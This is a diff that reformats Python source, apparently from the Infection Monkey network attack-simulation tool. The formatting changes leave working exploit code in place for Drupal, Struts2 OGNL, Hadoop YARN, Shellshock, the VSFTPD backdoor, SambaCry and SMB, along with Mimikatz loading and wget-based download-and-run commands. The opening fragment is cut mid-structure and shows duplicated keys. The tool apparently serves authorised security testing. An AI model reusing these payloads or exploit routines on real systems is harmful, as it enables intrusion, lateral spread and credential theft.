FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_FAILED:"ScoutSuite found permissive user access policies.",
STATUS_PASSED:"ScoutSuite found no issues related to user access policies.",
TEST_SCOUTSUITE_RESTRICTIVE_POLICIES: {
TEST_EXPLANATION_KEY: "ScoutSuite searched for permissive user access " "policies.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "ScoutSuite found permissive user access policies.",
STATUS_PASSED: "ScoutSuite found no issues related to user access policies.",
},
PRINCIPLE_KEY:PRINCIPLE_USERS_MAC_POLICIES,
PILLARS_KEY:[PEOPLE, WORKLOADS],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
PRINCIPLE_KEY: PRINCIPLE_USERS_MAC_POLICIES,
PILLARS_KEY: [PEOPLE, WORKLOADS],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
TEST_SCOUTSUITE_LOGGING:{
TEST_EXPLANATION_KEY:"ScoutSuite searched for issues, related to logging.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_FAILED:"ScoutSuite found logging issues.",
STATUS_PASSED:"ScoutSuite found no logging issues.",
TEST_SCOUTSUITE_LOGGING: {
TEST_EXPLANATION_KEY: "ScoutSuite searched for issues, related to logging.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "ScoutSuite found logging issues.",
STATUS_PASSED: "ScoutSuite found no logging issues.",
},
PRINCIPLE_KEY:PRINCIPLE_MONITORING_AND_LOGGING,
PILLARS_KEY:[AUTOMATION_ORCHESTRATION, VISIBILITY_ANALYTICS],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
PRINCIPLE_KEY: PRINCIPLE_MONITORING_AND_LOGGING,
PILLARS_KEY: [AUTOMATION_ORCHESTRATION, VISIBILITY_ANALYTICS],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
TEST_SCOUTSUITE_SERVICE_SECURITY:{
TEST_EXPLANATION_KEY:"ScoutSuite searched for service security issues.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_FAILED:"ScoutSuite found service security issues.",
STATUS_PASSED:"ScoutSuite found no service security issues.",
TEST_SCOUTSUITE_SERVICE_SECURITY: {
TEST_EXPLANATION_KEY: "ScoutSuite searched for service security issues.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "ScoutSuite found service security issues.",
STATUS_PASSED: "ScoutSuite found no service security issues.",
},
PRINCIPLE_KEY:PRINCIPLE_MONITORING_AND_LOGGING,
PILLARS_KEY:[DEVICES, NETWORKS],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
PRINCIPLE_KEY: PRINCIPLE_MONITORING_AND_LOGGING,
PILLARS_KEY: [DEVICES, NETWORKS],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
}
@ -315,13 +315,13 @@ EVENT_TYPE_MONKEY_LOCAL = "monkey_local"
EVENT_TYPES = (EVENT_TYPE_MONKEY_LOCAL, EVENT_TYPE_MONKEY_NETWORK)
PILLARS_TO_TESTS = {
DATA:[],
PEOPLE:[],
NETWORKS:[],
DEVICES:[],
WORKLOADS:[],
VISIBILITY_ANALYTICS:[],
AUTOMATION_ORCHESTRATION:[],
DATA: [],
PEOPLE: [],
NETWORKS: [],
DEVICES: [],
WORKLOADS: [],
VISIBILITY_ANALYTICS: [],
AUTOMATION_ORCHESTRATION: [],
}
PRINCIPLES_TO_TESTS = {}

View File

@ -14,29 +14,29 @@ class ScanStatus(Enum):
class UsageEnum(Enum):
SMB = {
ScanStatus.USED.value:"SMB exploiter ran the monkey by creating a service via MS-SCMR.",
ScanStatus.SCANNED.value:"SMB exploiter failed to run the monkey by creating a service "
ScanStatus.USED.value: "SMB exploiter ran the monkey by creating a service via MS-SCMR.",
ScanStatus.SCANNED.value: "SMB exploiter failed to run the monkey by creating a service "
"via MS-SCMR.",
}
MIMIKATZ = {
ScanStatus.USED.value:"Windows module loader was used to load Mimikatz DLL.",
ScanStatus.SCANNED.value:"Monkey tried to load Mimikatz DLL, but failed.",
ScanStatus.USED.value: "Windows module loader was used to load Mimikatz DLL.",
ScanStatus.SCANNED.value: "Monkey tried to load Mimikatz DLL, but failed.",
}
MIMIKATZ_WINAPI = {
ScanStatus.USED.value:"WinAPI was called to load mimikatz.",
ScanStatus.SCANNED.value:"Monkey tried to call WinAPI to load mimikatz.",
ScanStatus.USED.value: "WinAPI was called to load mimikatz.",
ScanStatus.SCANNED.value: "Monkey tried to call WinAPI to load mimikatz.",
}
DROPPER = {
ScanStatus.USED.value:"WinAPI was used to mark monkey files for deletion on next boot."
ScanStatus.USED.value: "WinAPI was used to mark monkey files for deletion on next boot."
}
SINGLETON_WINAPI = {
ScanStatus.USED.value:"WinAPI was called to acquire system singleton for monkey's "
ScanStatus.USED.value: "WinAPI was called to acquire system singleton for monkey's "
"process.",
ScanStatus.SCANNED.value:"WinAPI call to acquire system singleton"
ScanStatus.SCANNED.value: "WinAPI call to acquire system singleton"
" for monkey process wasn't successful.",
}
DROPPER_WINAPI = {
ScanStatus.USED.value:"WinAPI was used to mark monkey files for deletion on next boot."
ScanStatus.USED.value: "WinAPI was used to mark monkey files for deletion on next boot."
}

View File

@ -18,8 +18,7 @@ def get_version(build=BUILD):
def print_version():
parser = argparse.ArgumentParser()
parser.add_argument(
"-b", "--build", default=BUILD, help="Choose the build string for this version.",
type=str
"-b", "--build", default=BUILD, help="Choose the build string for this version.", type=str
)
args = parser.parse_args()
print(get_version(args.build))

View File

@ -52,13 +52,13 @@ class ControlClient(object):
has_internet_access = check_internet_access(WormConfiguration.internet_services)
monkey = {
"guid":GUID,
"hostname":hostname,
"ip_addresses":local_ips(),
"description":" ".join(platform.uname()),
"internet_access":has_internet_access,
"config":WormConfiguration.as_dict(),
"parent":parent,
"guid": GUID,
"hostname": hostname,
"ip_addresses": local_ips(),
"description": " ".join(platform.uname()),
"internet_access": has_internet_access,
"config": WormConfiguration.as_dict(),
"parent": parent,
}
if ControlClient.proxies:
@ -67,7 +67,7 @@ class ControlClient(object):
requests.post(
"https://%s/api/monkey" % (WormConfiguration.current_server,), # noqa: DUO123
data=json.dumps(monkey),
headers={"content-type":"application/json"},
headers={"content-type": "application/json"},
verify=False,
proxies=ControlClient.proxies,
timeout=20,
@ -134,15 +134,14 @@ class ControlClient(object):
"https://%s/api/monkey/%s"
% (WormConfiguration.current_server, GUID), # noqa: DUO123
data=json.dumps(monkey),
headers={"content-type":"application/json"},
headers={"content-type": "application/json"},
verify=False,
proxies=ControlClient.proxies,
timeout=MEDIUM_REQUEST_TIMEOUT,
)
except Exception as exc:
LOG.warning(
"Error connecting to control server %s: %s", WormConfiguration.current_server,
exc
"Error connecting to control server %s: %s", WormConfiguration.current_server, exc
)
return {}
@ -155,20 +154,19 @@ class ControlClient(object):
)
return
try:
telemetry = {"monkey_guid":GUID, "telem_category":telem_category, "data":json_data}
telemetry = {"monkey_guid": GUID, "telem_category": telem_category, "data": json_data}
requests.post(
"https://%s/api/telemetry" % (WormConfiguration.current_server,),
# noqa: DUO123
data=json.dumps(telemetry),
headers={"content-type":"application/json"},
headers={"content-type": "application/json"},
verify=False,
proxies=ControlClient.proxies,
timeout=MEDIUM_REQUEST_TIMEOUT,
)
except Exception as exc:
LOG.warning(
"Error connecting to control server %s: %s", WormConfiguration.current_server,
exc
"Error connecting to control server %s: %s", WormConfiguration.current_server, exc
)
@staticmethod
@ -176,19 +174,18 @@ class ControlClient(object):
if not WormConfiguration.current_server:
return
try:
telemetry = {"monkey_guid":GUID, "log":json.dumps(log)}
telemetry = {"monkey_guid": GUID, "log": json.dumps(log)}
requests.post(
"https://%s/api/log" % (WormConfiguration.current_server,), # noqa: DUO123
data=json.dumps(telemetry),
headers={"content-type":"application/json"},
headers={"content-type": "application/json"},
verify=False,
proxies=ControlClient.proxies,
timeout=MEDIUM_REQUEST_TIMEOUT,
)
except Exception as exc:
LOG.warning(
"Error connecting to control server %s: %s", WormConfiguration.current_server,
exc
"Error connecting to control server %s: %s", WormConfiguration.current_server, exc
)
@staticmethod
@ -206,8 +203,7 @@ class ControlClient(object):
except Exception as exc:
LOG.warning(
"Error connecting to control server %s: %s", WormConfiguration.current_server,
exc
"Error connecting to control server %s: %s", WormConfiguration.current_server, exc
)
return
@ -238,16 +234,15 @@ class ControlClient(object):
requests.patch(
"https://%s/api/monkey/%s"
% (WormConfiguration.current_server, GUID), # noqa: DUO123
data=json.dumps({"config_error":True}),
headers={"content-type":"application/json"},
data=json.dumps({"config_error": True}),
headers={"content-type": "application/json"},
verify=False,
proxies=ControlClient.proxies,
timeout=MEDIUM_REQUEST_TIMEOUT,
)
except Exception as exc:
LOG.warning(
"Error connecting to control server %s: %s", WormConfiguration.current_server,
exc
"Error connecting to control server %s: %s", WormConfiguration.current_server, exc
)
return {}
@ -287,7 +282,7 @@ class ControlClient(object):
else:
arch = "x86_64"
return {"os":{"type":os, "machine":arch}}
return {"os": {"type": os, "machine": arch}}
@staticmethod
def download_monkey_exe_by_filename(filename, size):
@ -316,8 +311,7 @@ class ControlClient(object):
except Exception as exc:
LOG.warning(
"Error connecting to control server %s: %s", WormConfiguration.current_server,
exc
"Error connecting to control server %s: %s", WormConfiguration.current_server, exc
)
@staticmethod
@ -333,7 +327,7 @@ class ControlClient(object):
"https://%s/api/monkey/download"
% (WormConfiguration.current_server,), # noqa: DUO123
data=json.dumps(host_dict),
headers={"content-type":"application/json"},
headers={"content-type": "application/json"},
verify=False,
proxies=ControlClient.proxies,
timeout=LONG_REQUEST_TIMEOUT,
@ -350,8 +344,7 @@ class ControlClient(object):
except Exception as exc:
LOG.warning(
"Error connecting to control server %s: %s", WormConfiguration.current_server,
exc
"Error connecting to control server %s: %s", WormConfiguration.current_server, exc
)
return None, None
@ -435,7 +428,7 @@ class ControlClient(object):
def report_start_on_island():
requests.post(
f"https://{WormConfiguration.current_server}/api/monkey_control/started_on_island",
data=json.dumps({"started_on_island":True}),
data=json.dumps({"started_on_island": True}),
verify=False,
timeout=MEDIUM_REQUEST_TIMEOUT,
)

View File

@ -53,8 +53,8 @@ class MonkeyDrops(object):
self.opts, _ = arg_parser.parse_known_args(args)
self._config = {
"source_path":os.path.abspath(sys.argv[0]),
"destination_path":self.opts.location,
"source_path": os.path.abspath(sys.argv[0]),
"destination_path": self.opts.location,
}
def initialize(self):
@ -147,7 +147,7 @@ class MonkeyDrops(object):
if OperatingSystem.Windows == SystemInfoCollector.get_os():
monkey_cmdline = (
MONKEY_CMDLINE_WINDOWS % {"monkey_path":self._config["destination_path"]}
MONKEY_CMDLINE_WINDOWS % {"monkey_path": self._config["destination_path"]}
+ monkey_options
)
else:
@ -156,12 +156,12 @@ class MonkeyDrops(object):
# and the inner one which actually
# runs the monkey
inner_monkey_cmdline = (
MONKEY_CMDLINE_LINUX % {"monkey_filename":dest_path.split("/")[-1]}
MONKEY_CMDLINE_LINUX % {"monkey_filename": dest_path.split("/")[-1]}
+ monkey_options
)
monkey_cmdline = GENERAL_CMDLINE_LINUX % {
"monkey_directory":dest_path[0: dest_path.rfind("/")],
"monkey_commandline":inner_monkey_cmdline,
"monkey_directory": dest_path[0 : dest_path.rfind("/")],
"monkey_commandline": inner_monkey_cmdline,
}
monkey_process = subprocess.Popen(
@ -189,8 +189,7 @@ class MonkeyDrops(object):
try:
if (
(self._config["source_path"].lower() != self._config[
"destination_path"].lower())
(self._config["source_path"].lower() != self._config["destination_path"].lower())
and os.path.exists(self._config["source_path"])
and WormConfiguration.dropper_try_move_first
):

View File

@ -49,12 +49,12 @@ class HostExploiter(Plugin):
def __init__(self, host):
self._config = WormConfiguration
self.exploit_info = {
"display_name":self._EXPLOITED_SERVICE,
"started":"",
"finished":"",
"vulnerable_urls":[],
"vulnerable_ports":[],
"executed_cmds":[],
"display_name": self._EXPLOITED_SERVICE,
"started": "",
"finished": "",
"vulnerable_urls": [],
"vulnerable_ports": [],
"executed_cmds": [],
}
self.exploit_attempts = []
self.host = host
@ -76,12 +76,12 @@ class HostExploiter(Plugin):
def report_login_attempt(self, result, user, password="", lm_hash="", ntlm_hash="", ssh_key=""):
self.exploit_attempts.append(
{
"result":result,
"user":user,
"password":password,
"lm_hash":lm_hash,
"ntlm_hash":ntlm_hash,
"ssh_key":ssh_key,
"result": result,
"user": user,
"password": password,
"lm_hash": lm_hash,
"ntlm_hash": ntlm_hash,
"ssh_key": ssh_key,
}
)
@ -120,4 +120,4 @@ class HostExploiter(Plugin):
:param cmd: String of executed command. e.g. 'echo Example'
"""
powershell = True if "powershell" in cmd.lower() else False
self.exploit_info["executed_cmds"].append({"cmd":cmd, "powershell":powershell})
self.exploit_info["executed_cmds"].append({"cmd": cmd, "powershell": powershell})

View File

@ -85,7 +85,7 @@ class DrupalExploiter(WebRCE):
response = requests.get(
f"{url}?_format=hal_json", # noqa: DUO123
json=payload,
headers={"Content-Type":"application/hal+json"},
headers={"Content-Type": "application/hal+json"},
verify=False,
timeout=MEDIUM_REQUEST_TIMEOUT,
)
@ -105,7 +105,7 @@ class DrupalExploiter(WebRCE):
r = requests.get(
f"{url}?_format=hal_json", # noqa: DUO123
json=payload,
headers={"Content-Type":"application/hal+json"},
headers={"Content-Type": "application/hal+json"},
verify=False,
timeout=LONG_REQUEST_TIMEOUT,
)
@ -171,20 +171,20 @@ def find_exploitbale_article_ids(base_url: str, lower: int = 1, upper: int = 100
def build_exploitability_check_payload(url):
payload = {
"_links":{"type":{"href":f"{urljoin(url, '/rest/type/node/INVALID_VALUE')}"}},
"type":{"target_id":"article"},
"title":{"value":"My Article"},
"body":{"value":""},
"_links": {"type": {"href": f"{urljoin(url, '/rest/type/node/INVALID_VALUE')}"}},
"type": {"target_id": "article"},
"title": {"value": "My Article"},
"body": {"value": ""},
}
return payload
def build_cmd_execution_payload(base, cmd):
payload = {
"link":[
"link": [
{
"value":"link",
"options":'O:24:"GuzzleHttp\\Psr7\\FnStream":2:{s:33:"\u0000'
"value": "link",
"options": 'O:24:"GuzzleHttp\\Psr7\\FnStream":2:{s:33:"\u0000'
'GuzzleHttp\\Psr7\\FnStream\u0000methods";a:1:{s:5:"'
'close";a:2:{i:0;O:23:"GuzzleHttp\\HandlerStack":3:'
'{s:32:"\u0000GuzzleHttp\\HandlerStack\u0000handler";'
@ -195,6 +195,6 @@ def build_cmd_execution_payload(base, cmd):
"".replace("|size|", str(len(cmd))).replace("|command|", cmd),
}
],
"_links":{"type":{"href":f"{urljoin(base, '/rest/type/shortcut/default')}"}},
"_links": {"type": {"href": f"{urljoin(base, '/rest/type/shortcut/default')}"}},
}
return payload

View File

@ -53,8 +53,8 @@ class ElasticGroovyExploiter(WebRCE):
exploit_config["dropper"] = True
exploit_config["url_extensions"] = ["_search?pretty"]
exploit_config["upload_commands"] = {
"linux":WGET_HTTP_UPLOAD,
"windows":CMD_PREFIX + " " + BITSADMIN_CMDLINE_HTTP,
"linux": WGET_HTTP_UPLOAD,
"windows": CMD_PREFIX + " " + BITSADMIN_CMDLINE_HTTP,
}
return exploit_config

View File

@ -64,8 +64,7 @@ class HadoopExploiter(WebRCE):
def exploit(self, url, command):
# Get the newly created application id
resp = requests.post(
posixpath.join(url, "ws/v1/cluster/apps/new-application"),
timeout=LONG_REQUEST_TIMEOUT
posixpath.join(url, "ws/v1/cluster/apps/new-application"), timeout=LONG_REQUEST_TIMEOUT
)
resp = json.loads(resp.content)
app_id = resp["application-id"]
@ -75,8 +74,7 @@ class HadoopExploiter(WebRCE):
)
payload = self.build_payload(app_id, rand_name, command)
resp = requests.post(
posixpath.join(url, "ws/v1/cluster/apps/"), json=payload,
timeout=LONG_REQUEST_TIMEOUT
posixpath.join(url, "ws/v1/cluster/apps/"), json=payload, timeout=LONG_REQUEST_TIMEOUT
)
return resp.status_code == 202
@ -93,8 +91,7 @@ class HadoopExploiter(WebRCE):
def build_command(self, path, http_path):
# Build command to execute
monkey_cmd = build_monkey_commandline(
self.host, get_monkey_depth() - 1,
vulnerable_port=HadoopExploiter.HADOOP_PORTS[0][0]
self.host, get_monkey_depth() - 1, vulnerable_port=HadoopExploiter.HADOOP_PORTS[0][0]
)
if "linux" in self.host.os["type"]:
base_command = HADOOP_LINUX_COMMAND
@ -102,22 +99,22 @@ class HadoopExploiter(WebRCE):
base_command = HADOOP_WINDOWS_COMMAND
return base_command % {
"monkey_path":path,
"http_path":http_path,
"monkey_type":MONKEY_ARG,
"parameters":monkey_cmd,
"monkey_path": path,
"http_path": http_path,
"monkey_type": MONKEY_ARG,
"parameters": monkey_cmd,
}
@staticmethod
def build_payload(app_id, name, command):
payload = {
"application-id":app_id,
"application-name":name,
"am-container-spec":{
"commands":{
"command":command,
"application-id": app_id,
"application-name": name,
"am-container-spec": {
"commands": {
"command": command,
}
},
"application-type":"YARN",
"application-type": "YARN",
}
return payload

View File

@ -200,8 +200,7 @@ class MSSQLExploiter(HostExploiter):
)
LOG.info(
"Successfully connected to host: {0}, using user: {1}, password ("
"SHA-512): {2}".format(host, user,
self._config.hash_sensitive_data(password))
"SHA-512): {2}".format(host, user, self._config.hash_sensitive_data(password))
)
self.add_vuln_port(MSSQLExploiter.SQL_DEFAULT_TCP_PORT)
self.report_login_attempt(True, user, password)

View File

@ -95,7 +95,7 @@ class SambaCryExploiter(HostExploiter):
self.exploit_info["shares"] = {}
for share in writable_shares_creds_dict:
self.exploit_info["shares"][share] = {"creds":writable_shares_creds_dict[share]}
self.exploit_info["shares"][share] = {"creds": writable_shares_creds_dict[share]}
self.try_exploit_share(share, writable_shares_creds_dict[share])
# Wait for samba server to load .so, execute code and create result file.
@ -118,10 +118,10 @@ class SambaCryExploiter(HostExploiter):
if trigger_result is not None:
successfully_triggered_shares.append((share, trigger_result))
url = "smb://%(username)s@%(host)s:%(port)s/%(share_name)s" % {
"username":creds["username"],
"host":self.host.ip_addr,
"port":self.SAMBA_PORT,
"share_name":share,
"username": creds["username"],
"host": self.host.ip_addr,
"port": self.SAMBA_PORT,
"share_name": share,
}
self.add_vuln_url(url)
self.clean_share(self.host.ip_addr, share, writable_shares_creds_dict[share])
@ -195,8 +195,7 @@ class SambaCryExploiter(HostExploiter):
file_content = None
try:
file_id = smb_client.openFile(
tree_id, "\\%s" % self.SAMBACRY_RUNNER_RESULT_FILENAME,
desiredAccess=FILE_READ_DATA
tree_id, "\\%s" % self.SAMBACRY_RUNNER_RESULT_FILENAME, desiredAccess=FILE_READ_DATA
)
file_content = smb_client.readFile(tree_id, file_id)
smb_client.closeFile(tree_id, file_id)
@ -237,12 +236,12 @@ class SambaCryExploiter(HostExploiter):
creds = self._config.get_exploit_user_password_or_hash_product()
creds = [
{"username":user, "password":password, "lm_hash":lm_hash, "ntlm_hash":ntlm_hash}
{"username": user, "password": password, "lm_hash": lm_hash, "ntlm_hash": ntlm_hash}
for user, password, lm_hash, ntlm_hash in creds
]
# Add empty credentials for anonymous shares.
creds.insert(0, {"username":"", "password":"", "lm_hash":"", "ntlm_hash":""})
creds.insert(0, {"username": "", "password": "", "lm_hash": "", "ntlm_hash": ""})
return creds
@ -268,7 +267,7 @@ class SambaCryExploiter(HostExploiter):
pattern_result = pattern.search(smb_server_name)
is_vulnerable = False
if pattern_result is not None:
samba_version = smb_server_name[pattern_result.start(): pattern_result.end()]
samba_version = smb_server_name[pattern_result.start() : pattern_result.end()]
samba_version_parts = samba_version.split(".")
if (samba_version_parts[0] == "3") and (samba_version_parts[1] >= "5"):
is_vulnerable = True
@ -406,8 +405,7 @@ class SambaCryExploiter(HostExploiter):
return BytesIO(
DROPPER_ARG
+ build_monkey_commandline(
self.host, get_monkey_depth() - 1, SambaCryExploiter.SAMBA_PORT,
str(location)
self.host, get_monkey_depth() - 1, SambaCryExploiter.SAMBA_PORT, str(location)
)
)

View File

@ -29,7 +29,7 @@ LOCK_HELPER_FILE = "/tmp/monkey_shellshock"
class ShellShockExploiter(HostExploiter):
_attacks = {"Content-type":"() { :;}; echo; "}
_attacks = {"Content-type": "() { :;}; echo; "}
_TARGET_OS_TYPE = ["linux"]
_EXPLOITED_SERVICE = "Bash"
@ -45,7 +45,7 @@ class ShellShockExploiter(HostExploiter):
def _exploit_host(self):
# start by picking ports
candidate_services = {
service:self.host.services[service]
service: self.host.services[service]
for service in self.host.services
if ("name" in self.host.services[service])
and (self.host.services[service]["name"] == "http")
@ -243,7 +243,7 @@ class ShellShockExploiter(HostExploiter):
LOG.debug("Header is: %s" % header)
LOG.debug("Attack is: %s" % attack)
r = requests.get(
url, headers={header:attack}, verify=False, timeout=TIMEOUT
url, headers={header: attack}, verify=False, timeout=TIMEOUT
) # noqa: DUO123
result = r.content.decode()
return result

View File

@ -24,8 +24,8 @@ class SmbExploiter(HostExploiter):
EXPLOIT_TYPE = ExploitType.BRUTE_FORCE
_EXPLOITED_SERVICE = "SMB"
KNOWN_PROTOCOLS = {
"139/SMB":(r"ncacn_np:%s[\pipe\svcctl]", 139),
"445/SMB":(r"ncacn_np:%s[\pipe\svcctl]", 445),
"139/SMB": (r"ncacn_np:%s[\pipe\svcctl]", 139),
"445/SMB": (r"ncacn_np:%s[\pipe\svcctl]", 445),
}
USE_KERBEROS = False
@ -119,7 +119,7 @@ class SmbExploiter(HostExploiter):
# execute the remote dropper in case the path isn't final
if remote_full_path.lower() != self._config.dropper_target_path_win_32.lower():
cmdline = DROPPER_CMDLINE_DETACHED_WINDOWS % {
"dropper_path":remote_full_path
"dropper_path": remote_full_path
} + build_monkey_commandline(
self.host,
get_monkey_depth() - 1,
@ -128,7 +128,7 @@ class SmbExploiter(HostExploiter):
)
else:
cmdline = MONKEY_CMDLINE_DETACHED_WINDOWS % {
"monkey_path":remote_full_path
"monkey_path": remote_full_path
} + build_monkey_commandline(
self.host, get_monkey_depth() - 1, vulnerable_port=self.vulnerable_port
)

View File

@ -58,8 +58,7 @@ class SSHExploiter(HostExploiter):
try:
ssh.connect(self.host.ip_addr, username=user, pkey=pkey, port=port)
LOG.debug(
"Successfully logged in %s using %s users private key", self.host,
ssh_string
"Successfully logged in %s using %s users private key", self.host, ssh_string
)
self.report_login_attempt(True, user, ssh_key=ssh_string)
return ssh

View File

@ -48,7 +48,7 @@ class Struts2Exploiter(WebRCE):
@staticmethod
def get_redirected(url):
# Returns false if url is not right
headers = {"User-Agent":"Mozilla/5.0"}
headers = {"User-Agent": "Mozilla/5.0"}
request = urllib.request.Request(url, headers=headers)
try:
return urllib.request.urlopen(
@ -85,7 +85,7 @@ class Struts2Exploiter(WebRCE):
"(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
"(#ros.flush())}" % cmd
)
headers = {"User-Agent":"Mozilla/5.0", "Content-Type":payload}
headers = {"User-Agent": "Mozilla/5.0", "Content-Type": payload}
try:
request = urllib.request.Request(url, headers=headers)
# Timeout added or else we would wait for all monkeys' output

View File

@ -26,12 +26,12 @@ def zerologon_exploiter_object(monkeypatch):
def test_assess_exploit_attempt_result_no_error(zerologon_exploiter_object):
dummy_exploit_attempt_result = {"ErrorCode":0}
dummy_exploit_attempt_result = {"ErrorCode": 0}
assert zerologon_exploiter_object.assess_exploit_attempt_result(dummy_exploit_attempt_result)
def test_assess_exploit_attempt_result_with_error(zerologon_exploiter_object):
dummy_exploit_attempt_result = {"ErrorCode":1}
dummy_exploit_attempt_result = {"ErrorCode": 1}
assert not zerologon_exploiter_object.assess_exploit_attempt_result(
dummy_exploit_attempt_result
)
@ -56,15 +56,15 @@ def test__extract_user_creds_from_secrets_good_data(zerologon_exploiter_object):
f"{USERS[i]}:{RIDS[i]}:{LM_HASHES[i]}:{NT_HASHES[i]}:::" for i in range(len(USERS))
]
expected_extracted_creds = {
USERS[0]:{
"RID":int(RIDS[0]),
"lm_hash":LM_HASHES[0],
"nt_hash":NT_HASHES[0],
USERS[0]: {
"RID": int(RIDS[0]),
"lm_hash": LM_HASHES[0],
"nt_hash": NT_HASHES[0],
},
USERS[1]:{
"RID":int(RIDS[1]),
"lm_hash":LM_HASHES[1],
"nt_hash":NT_HASHES[1],
USERS[1]: {
"RID": int(RIDS[1]),
"lm_hash": LM_HASHES[1],
"nt_hash": NT_HASHES[1],
},
}
assert zerologon_exploiter_object._extract_user_creds_from_secrets(mock_dumped_secrets) is None
@ -76,8 +76,8 @@ def test__extract_user_creds_from_secrets_bad_data(zerologon_exploiter_object):
f"{USERS[i]}:{RIDS[i]}:::{LM_HASHES[i]}:{NT_HASHES[i]}:::" for i in range(len(USERS))
]
expected_extracted_creds = {
USERS[0]:{"RID":int(RIDS[0]), "lm_hash":"", "nt_hash":""},
USERS[1]:{"RID":int(RIDS[1]), "lm_hash":"", "nt_hash":""},
USERS[0]: {"RID": int(RIDS[0]), "lm_hash": "", "nt_hash": ""},
USERS[1]: {"RID": int(RIDS[1]), "lm_hash": "", "nt_hash": ""},
}
assert zerologon_exploiter_object._extract_user_creds_from_secrets(mock_dumped_secrets) is None
assert zerologon_exploiter_object._extracted_creds == expected_extracted_creds

View File

@ -32,8 +32,7 @@ class TestPayload(TestCase):
pld2 = LimitedSizePayload(test_str2, max_length=16, prefix="prefix", suffix="suffix")
array2 = pld2.split_into_array_of_smaller_payloads()
test2 = bool(
array2[0] == "prefix1234suffix" and array2[1] == "prefix5678suffix" and len(
array2) == 2
array2[0] == "prefix1234suffix" and array2[1] == "prefix5678suffix" and len(array2) == 2
)
assert test1 and test2

View File

@ -60,12 +60,12 @@ class SmbTools(object):
return None
info = {
"major_version":resp["InfoStruct"]["ServerInfo102"]["sv102_version_major"],
"minor_version":resp["InfoStruct"]["ServerInfo102"]["sv102_version_minor"],
"server_name":resp["InfoStruct"]["ServerInfo102"]["sv102_name"].strip("\0 "),
"server_comment":resp["InfoStruct"]["ServerInfo102"]["sv102_comment"].strip("\0 "),
"server_user_path":resp["InfoStruct"]["ServerInfo102"]["sv102_userpath"].strip("\0 "),
"simultaneous_users":resp["InfoStruct"]["ServerInfo102"]["sv102_users"],
"major_version": resp["InfoStruct"]["ServerInfo102"]["sv102_version_major"],
"minor_version": resp["InfoStruct"]["ServerInfo102"]["sv102_version_minor"],
"server_name": resp["InfoStruct"]["ServerInfo102"]["sv102_name"].strip("\0 "),
"server_comment": resp["InfoStruct"]["ServerInfo102"]["sv102_comment"].strip("\0 "),
"server_user_path": resp["InfoStruct"]["ServerInfo102"]["sv102_userpath"].strip("\0 "),
"simultaneous_users": resp["InfoStruct"]["ServerInfo102"]["sv102_users"],
}
LOG.debug("Connected to %r using %s:\n%s", host, dialect, pprint.pformat(info))
@ -103,10 +103,10 @@ class SmbTools(object):
)
continue
share_info = {"share_name":share_name, "share_path":share_path}
share_info = {"share_name": share_name, "share_path": share_path}
if dst_path.lower().startswith(share_path.lower()):
high_priority_shares += ((ntpath.sep + dst_path[len(share_path):], share_info),)
high_priority_shares += ((ntpath.sep + dst_path[len(share_path) :], share_info),)
low_priority_shares += ((ntpath.sep + file_name, share_info),)
@ -128,8 +128,7 @@ class SmbTools(object):
smb.connectTree(share_name)
except Exception as exc:
LOG.debug(
"Error connecting tree to share '%s' on victim %r: %s", share_name, host,
exc
"Error connecting tree to share '%s' on victim %r: %s", share_name, host, exc
)
continue
@ -153,8 +152,7 @@ class SmbTools(object):
return remote_full_path
LOG.debug(
"Remote monkey file is found but different, moving along with "
"attack"
"Remote monkey file is found but different, moving along with " "attack"
)
except Exception:
pass # file isn't found on remote victim, moving on
@ -167,8 +165,7 @@ class SmbTools(object):
file_uploaded = True
T1105Telem(
ScanStatus.USED, get_interface_to_target(host.ip_addr), host.ip_addr,
dst_path
ScanStatus.USED, get_interface_to_target(host.ip_addr), host.ip_addr, dst_path
).send()
LOG.info(
"Copied monkey file '%s' to remote share '%s' [%s] on victim %r",
@ -181,8 +178,7 @@ class SmbTools(object):
break
except Exception as exc:
LOG.debug(
"Error uploading monkey to share '%s' on victim %r: %s", share_name, host,
exc
"Error uploading monkey to share '%s' on victim %r: %s", share_name, host, exc
)
T1105Telem(
ScanStatus.SCANNED,
@ -228,9 +224,9 @@ class SmbTools(object):
return None, None
dialect = {
SMB_DIALECT:"SMBv1",
SMB2_DIALECT_002:"SMBv2.0",
SMB2_DIALECT_21:"SMBv2.1",
SMB_DIALECT: "SMBv1",
SMB2_DIALECT_002: "SMBv2.0",
SMB2_DIALECT_21: "SMBv2.1",
}.get(smb.getDialect(), "SMBv3.0")
# we know this should work because the WMI connection worked

View File

@ -122,7 +122,7 @@ class VSFTPDExploiter(HostExploiter):
# Upload the monkey to the machine
monkey_path = dropper_target_path_linux
download_command = WGET_HTTP_UPLOAD % {"monkey_path":monkey_path, "http_path":http_path}
download_command = WGET_HTTP_UPLOAD % {"monkey_path": monkey_path, "http_path": http_path}
download_command = str.encode(str(download_command) + "\n")
LOG.info("Download command is %s", download_command)
if self.socket_send(backdoor_socket, download_command):
@ -135,7 +135,7 @@ class VSFTPDExploiter(HostExploiter):
http_thread.stop()
# Change permissions
change_permission = CHMOD_MONKEY % {"monkey_path":monkey_path}
change_permission = CHMOD_MONKEY % {"monkey_path": monkey_path}
change_permission = str.encode(str(change_permission) + "\n")
LOG.info("change_permission command is %s", change_permission)
backdoor_socket.send(change_permission)
@ -146,9 +146,9 @@ class VSFTPDExploiter(HostExploiter):
self.host, get_monkey_depth() - 1, vulnerable_port=FTP_PORT
)
run_monkey = RUN_MONKEY % {
"monkey_path":monkey_path,
"monkey_type":MONKEY_ARG,
"parameters":parameters,
"monkey_path": monkey_path,
